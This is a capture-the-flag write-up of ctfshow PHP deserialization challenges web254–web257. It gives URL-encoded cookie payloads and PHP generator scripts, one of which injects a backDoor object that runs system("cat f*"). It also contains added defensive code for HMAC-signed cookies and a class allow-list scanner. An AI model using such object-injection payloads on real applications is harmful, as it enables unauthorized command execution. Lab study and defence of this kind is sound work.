1. web254
A class ctfShowUser is defined with three properties and three methods. For this challenge it is enough to make the isVip property true, which happens when the submitted username and password equal the values hard-coded in the class.
payload:
username=xxxxxx&password=xxxxxx
2. web255
Here isVip has to be set to true through the cookie, and the cookie value must be a serialized object.
payload:
GET request username=xxxxxx&password=xxxxxx, with the cookie
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Generating the serialized content:
<?php
class ctfShowUser{
    public $isVip=True;
}
$user = urlencode(serialize(new ctfShowUser()));
echo $user;
?>
3. web256
Note that the login function performs a comparison and finally returns true or false; it does not assign. For this challenge username and password must differ, and isVip still has to be true; the serialized object overwrites the original property values.
payload:
GET request username=a&password=xxxxxx, with the cookie
user=O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Generating the serialized content:
<?php
class ctfShowUser{
    public $username='a';
    public $isVip=True;
}
echo urlencode(serialize(new ctfShowUser()));
?>
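In web255 and web256 the application calls unserialize() on a cookie the client controls, so every property of ctfShowUser, isVip included, is attacker-chosen. The following PHP is an added example, not code from the writeup or the challenge: it shows the fix a defender would apply, issuing the cookie as an HMAC-signed blob and verifying the signature before deserializing, while also limiting unserialize() to the one expected class. The class body, the SECRET constant and the function names issueUserCookie / loadUserCookie are assumptions made for the example.

```php
<?php
// Added example (not from the original writeup). The vulnerable pattern is
// unserialize($_COOKIE['user']); the server must instead be the only party able
// to produce a valid cookie. Names below (SECRET, issueUserCookie,
// loadUserCookie) are assumptions for this example.

class ctfShowUser {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip    = false;
}

// Server-side key. In a real deployment load it from configuration; this
// constant is a placeholder.
const SECRET = 'replace-with-a-random-32-byte-secret';

// Cookie layout: base64(serialized object) . "." . hex(HMAC-SHA256).
function issueUserCookie(ctfShowUser $u): string {
    $blob = serialize($u);
    $mac  = hash_hmac('sha256', $blob, SECRET);
    return base64_encode($blob) . '.' . $mac;
}

// Verify and decode; returns null on any tampering or malformed input.
function loadUserCookie(string $cookie): ?ctfShowUser {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $blob = base64_decode($parts[0], true);
    if ($blob === false) {
        return null;
    }
    // Constant-time comparison so the MAC cannot be recovered byte by byte.
    if (!hash_equals(hash_hmac('sha256', $blob, SECRET), $parts[1])) {
        return null;
    }
    // Even with a valid MAC, only the expected class may be instantiated;
    // anything else is turned into __PHP_Incomplete_Class by PHP.
    $obj = unserialize($blob, ['allowed_classes' => [ctfShowUser::class]]);
    return $obj instanceof ctfShowUser ? $obj : null;
}

// Demo: a server-issued cookie verifies; the web255 payload (decoded) with a
// made-up MAC is rejected because the attacker cannot compute the HMAC.
$legit  = issueUserCookie(new ctfShowUser());
var_dump(loadUserCookie($legit) instanceof ctfShowUser);

$forgedBlob = 'O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}';   // constructed from the writeup's payload
$forged     = base64_encode($forgedBlob) . '.' . str_repeat('0', 64);
var_dump(loadUserCookie($forged));
```

The signature does not make unserialize() safe on its own; it only ensures the blob is one the server produced. That is why allowed_classes is still passed: a server bug that lets attacker data reach serialize() would otherwise reopen the same door.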
4. web257
There are three classes. To execute a command we need the backDoor class. At the end of the object's lifetime getInfo() is called, and in backDoor the getInfo() method is the one that runs a command. So when the object is created, the class property can be swapped for a backDoor instance with its code property set; when the object is destroyed, the command that reads the flag runs.
payload:
GET request username=xxxxxx&password=xxxxxx, with the cookie
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22cat+f%2A%22%29%3B%22%3B%7D%7D
Generating the serialized content (the %00 bytes in the payload are the private-property prefix PHP adds for backDoor::$code):
<?php
class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat f*");';
}
echo urlencode(serialize(new ctfShowUser()));
?>
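web257 works because unserialize() instantiates whatever class the cookie names, here a backDoor nested inside ctfShowUser, and the destructor path later runs its code. The PHP below is an added example, not code from the writeup or the challenge, written from the defender's side: a scanner that lists every class name present in a serialized string before anything is deserialized, and a wrapper that refuses and logs when a class outside the allow-list appears, falling back to allowed_classes as a second barrier. The function names extractSerializedClasses / safeUnserialize and the placeholder payload are assumptions for the example; the command string from the writeup is replaced with a neutral placeholder.

```php
<?php
// Added example (not from the original writeup). Two defensive checks for the
// web257 pattern: enumerate the classes a serialized blob names before
// deserializing it, and refuse anything outside an allow-list. Function names
// (extractSerializedClasses, safeUnserialize) are assumptions for this example.

// Return every class name appearing as an object token O:<len>:"<name>" or a
// custom-serializable token C:<len>:"<name>" in a serialized string.
function extractSerializedClasses(string $data): array {
    preg_match_all('/[OC]:(\d+):"([^"]*)"/', $data, $m, PREG_SET_ORDER);
    $classes = [];
    foreach ($m as $tok) {
        // Trust the token only if the declared length matches the captured
        // name; a mismatch means malformed input or an attempt to confuse parsers.
        if ((int)$tok[1] === strlen($tok[2])) {
            $classes[] = $tok[2];
        }
    }
    return array_values(array_unique($classes));
}

// Deserialize only if every named class is allowed; otherwise log and refuse.
function safeUnserialize(string $data, array $allowed) {
    $found      = extractSerializedClasses($data);
    $unexpected = array_diff($found, $allowed);
    if ($unexpected) {
        // Detection hook: this log line is what a SIEM rule would alert on.
        error_log('unserialize refused, unexpected classes: ' . implode(',', $unexpected));
        return null;
    }
    // Second barrier: should the scanner ever be bypassed, classes not listed
    // here become __PHP_Incomplete_Class, whose __destruct()/__wakeup() never run.
    return unserialize($data, ['allowed_classes' => $allowed]);
}

// Constructed demo input shaped like the web257 payload after URL-decoding.
// "\0" is the private-property prefix PHP writes for backDoor::$code; the
// command string is replaced by an 11-byte placeholder so the length matches.
$payload = 'O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:14:"'
         . "\0backDoor\0code"
         . '";s:11:"placeholder";}}';

// Scanner report for the payload, then the refusal when only ctfShowUser is allowed.
print_r(extractSerializedClasses($payload));
var_dump(safeUnserialize($payload, ['ctfShowUser']));
```

The scanner is cheap to run at the edge (a WAF or request filter can apply the same regex to cookies and POST bodies), but it is a detection aid, not the fix: the allowed_classes option inside safeUnserialize() is what actually prevents the nested backDoor from ever being constructed.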
Reference article:
ctfshow deserialization (ctfshow反序列化)